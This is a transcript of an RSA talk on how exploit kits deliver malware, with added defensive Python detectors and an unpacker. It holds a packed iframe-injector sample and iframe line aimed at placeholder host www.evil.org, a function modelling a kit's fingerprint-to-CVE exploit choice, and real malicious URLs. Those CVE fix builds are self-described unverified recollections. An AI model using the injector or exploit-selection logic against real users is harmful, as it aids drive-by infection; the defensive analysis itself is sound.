Exploit Zoo: The Evolution of Exploit Kits

SESSION ID: TTA1-R09
#RSAC

Jordan Forssman
Sr Director, Product, Proofpoint, Inc.
Twitter: @Jordan4z

Posted 04-Oct-2018

TRANSCRIPT

Definition

Exploit Kit/Pack (EK): a set of resources that facilitate the distribution of malware by exploiting client-side software.

Anatomy of a Drive-by-Download (slides 3-8, shown as a build)

A victim's browser is walked through a chain of attacker-controlled hops, each hand-off invisible to the user:

<iframe src="www.evil.org"> injected into a legitimate page
→ Redirect
→ EK Landing Page
→ Malware Server
→ C2 Server

The deck numbers the stages of this chain, and the remaining slides follow them:

0 Distribution (the injected iframe and the redirect that deliver the browser to the kit)
1 Exploitation (the landing page)
2 Deployment (the malware server)
3 Escalation (the C2 server)
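An added example (not from the slides) of what the injection step looks like to a defender: a small Python scanner that pulls every <iframe> out of a page and flags the ones that are tiny or hidden by CSS, noting when they also point off-site. The sample page is constructed; www.evil.org is the slide's placeholder host, and the "example.com" page host is assumed.

```python
import re
from html.parser import HTMLParser

# Size values that mark a frame the user is never meant to see.
TINY = {"0", "1", "0px", "1px"}
# Inline CSS used to keep an injected frame invisible or off-screen.
HIDDEN_CSS = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:left|top)\s*:\s*-\d+", re.I)


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "").strip() for k, v in attrs})


def iframe_host(src):
    m = re.match(r"(?:https?:)?//([^/:?#]+)", src, re.I)
    return m.group(1).lower() if m else ""


def suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for iframes that are tiny or hidden via CSS.
    A third-party destination is reported as an extra reason, never on its own:
    visible third-party embeds (video, ads) are far too common to flag."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = []
        if attrs.get("width") in TINY or attrs.get("height") in TINY:
            reasons.append("tiny")
        if HIDDEN_CSS.search(attrs.get("style", "")):
            reasons.append("hidden-css")
        if not reasons:
            continue
        host = iframe_host(attrs.get("src", ""))
        if host and host != page_host and not host.endswith("." + page_host):
            reasons.append("third-party:" + host)
        findings.append((attrs.get("src", ""), reasons))
    return findings


# Constructed page: one ordinary video embed, one injected drive-by frame
# pointing at the slide's placeholder host www.evil.org.
SAMPLE_HTML = """<html><body>
<h1>Legitimate page</h1>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
<iframe src="http://www.evil.org/" width="1" height="1"
        style="visibility:hidden;position:absolute;left:-9999px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_HTML, "example.com"):
        print(src, why)
```

Run it over a crawl of your own sites: an injected frame is one of the few stage-0 artifacts that lives on infrastructure you control, so it is also the easiest to find and remove.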

A Perfect Storm

Lowering Tech Barriers
• Wordpress/Joomla
• Online Advertising
• Scripting Languages

Proliferation of Vulnerable Apps
• Adobe Flash
• Internet Explorer
• Java
• Silverlight

Division of Labor
• Exploit Development
• Malware Creation
• Targeting Technology
• Organized Crime

The Underground Economy
• Clickfraud
• Payloads for Sale
• Botnets
• Exploit Kits

The EK Zoo

[Image slide; image sources:]
contagiodump.blogspot
malware.dontneedcoffee.com
krebsonsecurity.com
xylibox.com
kahusecurity.com
blog.malwaremustdie.org
malekal.com

Targeting Vs Evasion

Stage 0: Distribution - Targeting Vs Evasion (slide 12)

Targeting
• Phishing
• Injection
• Watering Hole
• Long-Lining
• SEO Poisoning

Evasion
• Dynamic DNS
• Fast-Fluxing
• Obfuscation

Dynamic DNS & Fast-Fluxing

Dynamic DNS
• Constantly reset DNS records to point to a new IP address
• Available as a service; IPs limited to within a specific ASN

Fast-Fluxing
• Constantly reset DNS records to point to a new IP address
• Custom built; access to global IPs

[Figure: www.evil.org resolving in turn to a small set of IP addresses that cycle over and over; the addresses run together in the transcript and are not reproduced here.]
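Added example, not part of the talk: the slide's distinction turned into a check over resolution history. Given repeated lookups of one name (timestamp, answer, TTL, origin ASN), it labels the name stable, dynamic-DNS-like (fast rotation inside one ASN) or fast-flux-like (fast rotation across many ASNs). The observations, the RFC 5737 addresses, the ASNs and the hostnames host.ddns.example and www.example.com are constructed; the IP-to-ASN mapping is assumed to come from outside (BGP or whois data).

```python
from dataclasses import dataclass
from statistics import mean


@dataclass(frozen=True)
class Lookup:
    """One observed A-record answer for a domain.
    asn is assumed to come from an external IP-to-ASN mapping (whois/BGP data)."""
    ts: int     # Unix time of the lookup
    ip: str
    ttl: int    # TTL returned with the answer, in seconds
    asn: int


def rotation_profile(lookups):
    ts = [l.ts for l in lookups]
    span_hours = max((max(ts) - min(ts)) / 3600.0, 1 / 3600.0)
    ips = {l.ip for l in lookups}
    return {
        "distinct_ips": len(ips),
        "distinct_asns": len({l.asn for l in lookups}),
        "ips_per_hour": len(ips) / span_hours,
        "mean_ttl": mean(l.ttl for l in lookups),
    }


def classify(lookups, max_ttl=300, min_ips_per_hour=3, min_asns=3):
    """The slide's distinction: both techniques rotate records constantly, but
    dynamic DNS stays inside one provider's ASN while fast-flux spreads over
    global (typically bot-hosted) IPs. Returns 'stable', 'dynamic-dns' or 'fast-flux'."""
    p = rotation_profile(lookups)
    if p["mean_ttl"] > max_ttl or p["ips_per_hour"] < min_ips_per_hour:
        return "stable"
    return "fast-flux" if p["distinct_asns"] >= min_asns else "dynamic-dns"


# Constructed observations (RFC 5737 documentation addresses, made-up ASNs):
# six lookups of each name spread over 30 minutes.
T0 = 1_464_775_200
FLUX = [Lookup(T0 + 300 * i, ip, 60, asn) for i, (ip, asn) in enumerate([
    ("192.0.2.10", 64500), ("198.51.100.23", 64501), ("203.0.113.77", 64502),
    ("192.0.2.88", 64503), ("198.51.100.5", 64504), ("203.0.113.14", 64505)])]
DDNS = [Lookup(T0 + 300 * i, ip, 60, 64510) for i, ip in enumerate([
    "198.51.100.1", "198.51.100.2", "198.51.100.3",
    "198.51.100.4", "198.51.100.5", "198.51.100.6"])]
STABLE = [Lookup(T0 + 300 * i, "203.0.113.200", 3600, 64520) for i in range(6)]

if __name__ == "__main__":
    for name, obs in (("www.evil.org", FLUX), ("host.ddns.example", DDNS),
                      ("www.example.com", STABLE)):
        print(name, classify(obs), rotation_profile(obs))
```

The obvious false positive is a CDN: short TTLs and many addresses, usually inside one or two ASNs, which this heuristic would call "dynamic-dns". Pair it with a CDN allowlist and domain age before alerting on it.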

Stage 0: Targeting Vs Evasion (slide 14)

Targeting
• Phishing
• Injection
• Watering Hole
• Long-Lining
• SEO Poisoning

Evasion
• Dynamic DNS
• Fast-Fluxing
• Domain Shadowing
• Open Redirect
• Domain Rotation
• Obfuscation
• Encryption

Domain Shadowing

Creating sub-domains under legitimate domains whose owner accounts have been compromised (the registrar/DNS account, not necessarily the web server) to redirect to illicit pages.

Example: one IP address, 162.244.33.179, behind shadowed sub-domains of many unrelated legitimate domains:

http://aleksandryn.car-ledlights.com/farm_microseconds_bodice_heaves/726966984312851711
http://aleksandryn.car-ledlights.com/acquisitiveness_loners_nostalgia_deadlocks/987509513944626652
http://aleksandryn.car-ledlights.com/hared-steeds-unsaddled-worthier/817449604617897447
http://prajakirk.car-ledlights.com/…
http://medimnmidtpunktoformulen.car-ledlights.com/...
http://lawyeress.4banadult.net/…
http://chensu.cariddeancom.jp/…
http://machinerquefluentness.7716e.tv/…
http://pidtyistachtbaarst.4banadult.net/…
http://corralseaantvir.indiacypher.com/…
http://kyttyrisell.vasic.ws/…
http://komiteanmietintjen.10musumee.com/…
http://nheader.c0930c.com/…
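Added example (my code, not the presenter's): a detector for the pattern on this slide. It groups URLs from proxy or passive-DNS logs by registered domain, counts distinct unexpected sub-domain labels, and separately matches the landing-page path shape seen above (words joined by _ or -, then a long number). The input is the slide's own URL list; the naive eTLD+1 rule and the EXPECTED_LABELS allowlist are simplifications I chose.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hostnames a legitimate site is expected to publish; anything else under a
# registered domain counts as a candidate shadow.
EXPECTED_LABELS = {"www", "mail", "ftp", "smtp", "ns1", "ns2", "webmail", "blog", "shop"}

# Landing-page path shape from the slide: dictionary words joined by '_' or '-',
# then a long run of digits.
EK_PATH = re.compile(r"^/[a-z]+(?:[_-][a-z]+){2,}/\d{12,}$")


def registered_domain(host):
    """eTLD+1 by the naive 'last two labels' rule. Good enough for the sample;
    a production version should consult the Public Suffix List (think co.uk)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def shadow_candidates(urls, min_subdomains=2):
    """Group URLs by registered domain and return {domain: sorted(labels)} for
    domains carrying at least min_subdomains unexpected sub-domain labels."""
    labels = defaultdict(set)
    for u in urls:
        host = (urlsplit(u).hostname or "").lower()
        reg = registered_domain(host)
        sub = host[: -len(reg) - 1] if host.endswith("." + reg) else ""
        if sub and sub not in EXPECTED_LABELS:
            labels[reg].add(sub)
    return {d: sorted(s) for d, s in labels.items() if len(s) >= min_subdomains}


def looks_like_ek_path(url):
    return bool(EK_PATH.match(urlsplit(url).path))


# The shadowed hosts listed on the slide; the '…' paths are as given there.
SLIDE_URLS = [
    "http://aleksandryn.car-ledlights.com/farm_microseconds_bodice_heaves/726966984312851711",
    "http://aleksandryn.car-ledlights.com/acquisitiveness_loners_nostalgia_deadlocks/987509513944626652",
    "http://aleksandryn.car-ledlights.com/hared-steeds-unsaddled-worthier/817449604617897447",
    "http://prajakirk.car-ledlights.com/…",
    "http://medimnmidtpunktoformulen.car-ledlights.com/...",
    "http://lawyeress.4banadult.net/…",
    "http://chensu.cariddeancom.jp/…",
    "http://machinerquefluentness.7716e.tv/…",
    "http://pidtyistachtbaarst.4banadult.net/…",
    "http://corralseaantvir.indiacypher.com/…",
    "http://kyttyrisell.vasic.ws/…",
    "http://komiteanmietintjen.10musumee.com/…",
    "http://nheader.c0930c.com/…",
]

if __name__ == "__main__":
    for dom, subs in shadow_candidates(SLIDE_URLS).items():
        print(dom, subs)
    print([u for u in SLIDE_URLS if looks_like_ek_path(u)])
```

In real logs the second signal is the stronger one: many shadow hosts across unrelated domains resolving to the same handful of IPs (as on the slide), so join this output against the resolved address before escalating.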

Stage 0: Distribution - Targeting Vs Evasion (slide 16)

Targeting
• Phishing
• Injection
• Watering Hole
• Long-Lining
• Traffic Direction Systems (TDS)
• Malvertising
• Finger-printing
• SEO Poisoning

Evasion
• Dynamic DNS
• Fast-Fluxing
• Domain Shadowing
• Open Redirect
• Domain Rotation
• Obfuscation
• Encryption

Stage 0: Distribution (slides 17-23, shown as a build)

The chain again, with the distribution stage highlighted:

<iframe src="www.evil.org"> → Redirect → EK Landing Page → Malware Server → C2 Server

What the visitor is actually served is obfuscated script. The slide shows a blob packed with the widely used p,a,c,k,e,d JavaScript packer:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…

Before that script is returned, a Traffic Direction System (TDS) gates every request. The build adds one check at a time; a visitor who fails any check is dropped ("End") and never sees the landing page, which is how the kit keeps researchers, crawlers and the wrong geographies out:

IP OK? → no → End
Referrer OK? → no → End
Browser OK? → no → End
all yes → obfuscated landing page is served
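Added example, not from the deck: a static unpacker for the p,a,c,k,e,d packer whose header appears above, so a captured landing page can be read without evaluating it. The packed sample is one I built by hand (base 10, which is what the slide's e=function(c){return c} implies) and decodes to an iframe injector aimed at the slide's placeholder host www.evil.org; real landing pages usually nest further obfuscation inside the unpacked text.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(n, base):
    """Reproduce the packer's word-index encoder: base-36 digits for values up to 35,
    then 'A'..'Z' via chr(value + 29) when the base is above 36 (base-62 packs)."""
    prefix = "" if n < base else encode_index(n // base, base)
    r = n % base
    return prefix + (chr(r + 29) if r > 35 else DIGITS[r])


def unpack(p, a, c, k):
    """Undo eval(function(p,a,c,k,e,d){...}) without executing anything: every
    \\w+ token in p that is a packed index is replaced by its keyword from k."""
    table = {}
    for i in range(c):
        key = encode_index(i, a)
        table[key] = k[i] if i < len(k) and k[i] else key   # empty k[i]: word was its own index
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


# Matches the trailing argument list: ('<packed>', base, count, '<kw|kw|...>'.split('|')
ARGS = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)",
    re.S)


def unpack_eval(source):
    m = ARGS.search(source)
    if not m:
        raise ValueError("no p,a,c,k argument list found")
    packed = m.group(1).encode("utf-8").decode("unicode_escape")  # undo JS string escapes
    return unpack(packed, int(m.group(2)), int(m.group(3)), m.group(4).split("|"))


# Constructed sample, packed by hand with base 10 (hence e=function(c){return c},
# exactly as on the slide). It hides an iframe injector pointing at the slide's
# placeholder host www.evil.org.
SAMPLE = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String))"
    "{while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}"
    "('0 1=2.3(\\'4\\');1.5=\\'6://7.8.9\\';1.10=1.11=12;2.13.14(1);',10,15,"
    "'var|f|document|createElement|iframe|src|http|www|evil|org|width|height|1|body|appendChild'"
    ".split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack_eval(SAMPLE))
```

Because the unpacker only does string substitution, it is safe to run over bulk captures; anything it cannot parse (a modified header, a second layer of packing) is a signal in itself and should go to a sandboxed JavaScript engine instead.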

Stage 1: Exploitation – Exploits (slides 24-29, shown as a build)

• Multiple Exploits: several exploits for different client-side apps bundled together, which is what makes it an "Exploit Kit/Pack"
• Chained Exploits: each performing necessary functions
• Fingerprinting Exploits: flash.system.Capabilities exposes player version, OS and similar details to a SWF (source: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/system/Capabilities.html)
• Evasive Exploits
• Code Execution\Memory Corruption Exploits
• Local Privilege Escalation Exploits

Stage 1: Exploitation - Example

30

#RSAC

Stage 1: Exploitation -Example

31

#RSAC

Stage 1: Exploitation - Example

32

#RSAC

Stage 1: Exploitation - Example

33

#RSAC

Stage 1: Exploitation - Example

34

#RSAC

Stage 1: Exploitation - Example

35

#RSAC

Stage 1: Exploitation - Example

36

CVE-2015-8651CVE-2015-8446CVE-2015-7645

#RSAC

Stage 1: Exploitation - Example

37

CVE-2016-0034

#RSAC
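Added example (not from the slides): the fingerprint-to-exploit decision for the CVEs listed above, written as a version comparison. It parses the strings a landing page would harvest (flash.system.Capabilities.version style "WIN 20,0,0,235", navigator.plugins style "20.0.0.235", Silverlight "5.1.41212.0") and lists which CVEs the reported build predates. The fixed-in builds are my recollection of Adobe bulletins APSB15-27, APSB15-32 and APSB16-01 and Microsoft MS16-006, not figures from the talk; verify them before use. The same function run over an endpoint inventory answers the "Patch!" question on the mitigation slides.

```python
import re

# Fixed-in builds for the CVEs named on the slides. These values are my
# recollection of the vendor bulletins (Adobe APSB15-27, APSB15-32, APSB16-01;
# Microsoft MS16-006), not figures from the slides; verify against the bulletins
# before relying on them. They cover the standard Flash release branch only.
FIXED_IN = {
    "flash": {
        "CVE-2015-7645": (19, 0, 0, 226),
        "CVE-2015-8446": (20, 0, 0, 235),
        "CVE-2015-8651": (20, 0, 0, 267),
    },
    "silverlight": {
        "CVE-2016-0034": (5, 1, 41212, 0),
    },
}

# Accepts 'WIN 20,0,0,235' (flash.system.Capabilities.version, comma separated),
# '20.0.0.235' (navigator.plugins description) and '5.1.41212.0' (Silverlight).
VERSION = re.compile(r"(\d+)[.,](\d+)[.,](\d+)[.,](\d+)")


def parse_version(text):
    m = VERSION.search(text)
    if not m:
        raise ValueError("no 4-part version in %r" % text)
    return tuple(int(x) for x in m.groups())


def exploitable(plugin, version_text):
    """CVEs from the table whose fix post-dates the reported build."""
    v = parse_version(version_text)
    return sorted(cve for cve, fixed in FIXED_IN[plugin].items() if v < fixed)


def select_exploit(fingerprint):
    """The kit's side of the decision: fingerprint maps plugin -> reported version
    (None if the plugin is absent). Returns every (plugin, CVE) worth serving;
    an empty list is where a real kit would show a benign page instead."""
    hits = []
    for plugin, text in fingerprint.items():
        if plugin in FIXED_IN and text:
            hits.extend((plugin, cve) for cve in exploitable(plugin, text))
    return hits


# Constructed fingerprints, as a landing page would collect them.
VICTIM = {"flash": "WIN 19,0,0,207", "silverlight": None}
PATCHED = {"flash": "WIN 20,0,0,267", "silverlight": "5.1.41212.0"}

if __name__ == "__main__":
    print(select_exploit(VICTIM))
    print(select_exploit(PATCHED))
```

One caveat a real check must handle: Flash shipped an Extended Support branch (18.x) with its own fixed builds, so a single threshold per CVE misjudges an 18.0.0.x install. PluginDetect-style code in the kits branches on the major version first; an inventory check should do the same.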

Stage 1: Exploitation

38

T

IP OK?

D

Referrer OK?

S

Browser OK?

End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…

Stage 2: Deployment - Dropper

[Image slide; not preserved in the transcript.]

Stage 2: Deployment (slides 40-41)

[Same TDS gate diagram, now highlighting the deployment step.]

Stage 0/1/2/3: Signature Evasion

Scan4You: an underground antivirus checker. Kit operators run URLs, exploits, droppers and payloads through it before use, so that what reaches the victim is already known not to trip the major AV engines.

Stage 2: Deployment - Payloads

• Ransomware
• Backdoor\RAT
• Infostealer
• Botnet
• Banking Trojan
• Rootkit

Stage 2/3: Deployment – VM Evasion

Human Specific
• Mouse movement
• CAPTCHA
• Zip

Config. Specific
• Sleep calls
• CPU cycles
• SSDT de-hooking
• File-less malware

Environ. Specific
• Version checks
• PHP preg_replace
• IP checks

VM Specific
• System services
• File-based entropy
• CPU core/RAM counts
• Registry keys
• UUIDs

Stage 3: Escalation - Evasion

• Dynamic DNS
• Fast Fluxing
• Domain Generation Algorithms (DGA)
• Open C2 channels: Gmail, Twitter, other…

Stage 3: Escalation (slides 46-47)

[Same TDS gate diagram, now highlighting the C2 step.]

Sweet Orange

Payloads: Andromeda, Darkshell, Kovter, Qbot, Rerdom, Reveton, Rovnix, Teslacrypt, TSPY_BANKER, Zemot
Exploits: [bar chart; values 1, 7, 2, 11, 1, 1; category labels not preserved in the transcript]
Prevalence: [Google Trends chart]
Features: Iframe cryptor; Scan4You integration; TDS
Price: $2,500, or $1,400/month
Traffic rate: 150,000/day
Infection rate: 10-15%

Dashboard
Image sources:
http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.html
https://www.virusbulletin.com/virusbulletin/2013/03/what-are-browser-exploit-kits-look-sweet-orange-and-propack

Nuclear

Payloads: Andromeda, Boaxxe, Caphaw, Cerber, Cryptowall, Coverton, Glupteba, Gootkit, Kazy, Kelihos, Kovter, Locky, Rovnix, Shade, Spyeye, Teslacrypt, Vawtrak, Viknok, Waldek-G, Zemot, Zeus
Exploits (v3): [bar chart; values 1, 15, 2, 7, 2, 1; category labels not preserved in the transcript]
Prevalence: [Google Trends chart]
Features: Infecting domain rotator; Domain & payload detection check; Payload & exploit update; LP obfuscation; XMLDOM AV check (cve-2013-733); Sub-leasing service
Price: WMZ 500/week, WMZ 1,600/month
Infection rate: 10%

Dashboard
Image source: https://blog.checkpoint.com/wp-content/uploads/2016/04/Inside-Nuclear-1-2.pdf

Magnitude (aka "Top-exp", "Deathtouch", "Popads")

Payloads: Aleuron, Cerber, Cryptodefense, Cryptolocker, Cryptowall 1, 2, 3, Cutwail, Dorkbot, Kelihos, Necurs, Nymaim, Redyms, Simda, Stitur, Tepfer, Tinba, Tracur, Urausy, Vawtrak, Winwebsec, ZeroAccess, Zeus
Exploits: [bar chart; values 1, 3, 5, 2, 1, 3, 16; category labels not preserved in the transcript]
Prevalence: [Google Trends chart]
Features: Exploit obfuscation; Scan4you integration; PluginDetect; Domain rotator; TDS (blocks countries with Russian extradition treaties); Traffic share (business model)
Price: 15-20% of infected machines

RIG

Payloads: Cryptodefense, Cryptowall 1, 2, 3, Cutwail, Dyranges, Dyre, OphionLocker, Pony, Qbot, Tinba, Tofsee, Zeus
Exploits: [bar chart; values 6, 2, 2, 9, 1; category labels not preserved in the transcript]
Prevalence: [Google Trends chart]
Features: Obfuscated LP; Virtual dedicated server for exploits; XOR-encoded shellcode; Scan4You integration; Domain rotator; PluginDetect; XMLDOM AV check; Cloudflare anti-DDoS protection; Only targets IE; Hosted @ Eurobyte
Price: $60/day, $300/week

Angler

Payloads: AlphaCrypt, Andromeda, Asprox, Bedep, BloCrypt, Bunitu, Caphaw, Cryptowall 1, 2, 3, 4, CryptXXX, CTB Locker, Cutwail, Dridex, Dynamer, Dyre, [Fileless Infection], GameoverZeus, Glupteba, Gootkit, Koler, Kovter, Necurs, Pony, Poweliks, Reveton, Rombertik, Shifu, TeslaCrypt, ThreatFinder, Tinba, Torrentlocker, Trapwot, Vawtrak, Zeus
Exploits: [bar chart; values 4, 2, 4, 1, 1, 1, 23; category labels not preserved in the transcript]
Prevalence: [Google Trends chart]
Features: Domain & payload AV check; AV detection; Dropper encryption; Sandbox detection; Exploit obfuscation; Domain shadowing; Dynamic DNS; DGA; File-less malware; TDS with IP recording; 302 cushioning
Price: $ ???
Infection rate: 40%

Blackhole

Most prevalent
Author, "Paunch", arrested 2013
[Google Trends chart comparing Blackhole and Angler search interest over time]

The Future of Exploit Kits? (slides 56-58)

Vulnerable applications are key
http://arstechnica.com/information-technology/2016/05/html5-by-default-googles-plan-to-make-chromes-flash-click-to-play/
http://krebsonsecurity.com/

[Slide 57: image, not preserved in the transcript]

Source: http://virusguides.com/exploit-generator-kit-links-three-cyber-espionage-campaigns-originate-china/

The Future of Exploit Kits? - Malicious Macros (slides 59-60)

• Successful at evading signature & reputation defenses as well as newer behavioral sandboxes
• Frequently updated at low cost
• Cross-platform & un-patchable, as the attack relies on the end user & social engineering to bypass automated defenses
• Low up-front & maintenance cost increases ROI

Source: The Cybercrime Economics of Malicious Macros, https://www.proofpoint.com/MaliciousMacros

Update: June 2016

The end of Angler?

[Google Trends chart: Blackhole, RIG, Angler, Nuclear, Magnitude]

The Future of Exploit Kits? (slides 63-64)

Source: http://www.blog.geoedge.com/#!New-Security-Report-HTML5-Susceptibility-to-Malware-in-Video-Ads/c193z/576789860cf2a84be5a0205e
Source: http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/

Mitigation – The Obvious Stuff

Patch!
• Secunia Personal Software Inspector
• Windows Update

Lock-down
• Limit Javascript (NoScript, ScriptSafe)
• Disable Flash/Silverlight/ActiveX
• MS EMET

Back-ups

Use Anti-Virus

Train Users

Mitigation – Get Informed

Follow these sites/blogs:
• malware.dontneedcoffee.com
• malware-traffic-analysis.net
• blog.malwarebytes.net
• proofpoint.com/us/threat-insight
• blog.malwaremustdie.org
• contagiodump.blogspot
• malwaresigs.com
• kahusecurity.com
• blog.talosintel.com
• trustwave.com/Resources/SpiderLabs-Blog/

Use these resources:
• Recorded Future Cyber Daily
• CVE Details RSS Feed

Mitigation – Open Source Tools

For your Network
• NIDS: Suricata/Snort/Bro; leverage ETOpen & Snort rules
• SecurityOnion: includes the above tools & other network analyzers: Sguil & Squert, Xplico, NetworkMiner

For your Endpoints
• AntiVirus
• Microsoft EMET
• OSSEC HIDS
• Sysinternals (Sysmon): logs process creation, network connections and file creation time changes; logs events from early boot
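Added example (my code, not the presenter's): the Sysmon correlation the last bullet points at, run over constructed events. It pairs Event ID 1 (process create) with Event ID 3 (network connection) to catch a browser spawning a binary from a user-writable path that calls out within a minute, which is the drive-by's deployment step handing over to C2. A benign browser-spawns-browser tab is included to show it does not fire. GUIDs, file names and the 198.51.100.7 and 203.0.113.10 addresses are made up; the field names follow Sysmon's.

```python
import os
from datetime import datetime

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
# Paths an exploit's dropper typically writes to: user-writable, no admin needed.
WRITABLE_HINTS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                  "\\users\\public\\", "\\programdata\\")


def image_name(path):
    return os.path.basename(path.replace("\\", "/")).lower()


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def browser_dropper_chains(events, max_delay=60):
    """Correlate Sysmon Event ID 1 (process create) with Event ID 3 (network
    connection): a browser spawns a non-browser binary from a user-writable
    path, and that child talks out within max_delay seconds. That is the
    Stage 2 -> Stage 3 hand-off (dropper run, then C2 call-back)."""
    spawned = {}   # ProcessGuid of a suspicious child -> its creation event
    for e in events:
        if e["EventID"] != 1 or image_name(e["ParentImage"]) not in BROWSERS:
            continue
        image = e["Image"].lower()
        if image_name(image) not in BROWSERS and any(h in image for h in WRITABLE_HINTS):
            spawned[e["ProcessGuid"]] = e
    alerts = []
    for e in events:
        if e["EventID"] != 3 or e["ProcessGuid"] not in spawned:
            continue
        created = spawned[e["ProcessGuid"]]
        delay = (parse_time(e["UtcTime"]) - parse_time(created["UtcTime"])).total_seconds()
        if 0 <= delay <= max_delay:
            alerts.append({
                "parent": created["ParentImage"],
                "child": created["Image"],
                "dest": "%s:%s" % (e["DestinationIp"], e["DestinationPort"]),
                "delay_s": delay,
            })
    return alerts


# Constructed Sysmon-style events (GUIDs, paths and addresses are made up):
# a browser tab (benign), then a dropper written to %TEMP% that calls out.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2016-06-01 10:00:01", "ProcessGuid": "{G1}",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "UtcTime": "2016-06-01 10:00:02", "ProcessGuid": "{G2}",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"EventID": 3, "UtcTime": "2016-06-01 10:00:03", "ProcessGuid": "{G2}",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "UtcTime": "2016-06-01 10:00:40", "ProcessGuid": "{G3}",
     "Image": r"C:\Users\bob\AppData\Local\Temp\rad3F2.tmp.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"EventID": 3, "UtcTime": "2016-06-01 10:00:44", "ProcessGuid": "{G3}",
     "Image": r"C:\Users\bob\AppData\Local\Temp\rad3F2.tmp.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 80},
]

if __name__ == "__main__":
    for a in browser_dropper_chains(SAMPLE_EVENTS):
        print(a)
```

The same two event types also cover the file-less variants on the VM-evasion slide if you widen the child check to script hosts (powershell.exe, wscript.exe, regsvr32.exe) spawned by a browser, since those never touch a user-writable path but still make the call-back.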

What Next?

Over the next week: start to audit the Obvious; find out where you stand
Over the next month: get Informed; fix any holes in the Obvious
Over the next 6 months: evaluate and deploy necessary tools and training programs

The EK Zoo

[Word-cloud slide of exploit kit names:]
Angler, Neutrino, Blackhole, Nuclear, Sweet Orange, Crimepack, Magnitude, RIG, Phoenix, Whitehole, Sakura, Fiesta, Goon, Infinity, LightsOut, Flashpack, Archie, Astrum, Zuponcic, Hanjuan, Kaixin, Niteris, Null Hole, CK, Snet, Styx, Ramayana, Crime Boss, HiMan, Kein, Impact, Grandsoft, x2o, White Lotus, RS, PandorasBox, Glazunov, Silence, RedKit, NoMatch, BestPack, Nice Pack, Pro Pack, BleedingLife, Neosploit, NucSoft, AlphaPack, Eleonore, ANRAM, Techno, Yang, Siberia, Heirarchy, Zhi Zhu, Yes, Savage, Arabella, Lupit, Intoxicated, Napoleon, iPack, JustExploit, Metapack, K0de, Shaman's Dream, Singer's, Deathpack, FlooP, Demonpack, Underwater EK, Max, Impossible Sploit, PDF Xploit, sprEaDEr, FSPack, Zombie, Kameleon, Clean Pack, Lucky Sploit, Web Attacker, IcePack, Cry217, eCore, FirePack, Prime, n404, Mpack, MassInfect, Target, Merry Christmas, My Poly Sploit, Liberty, Infector, Sploit25, sPack, Apache Exploit, IEKit, Tornado, Papka, Sphere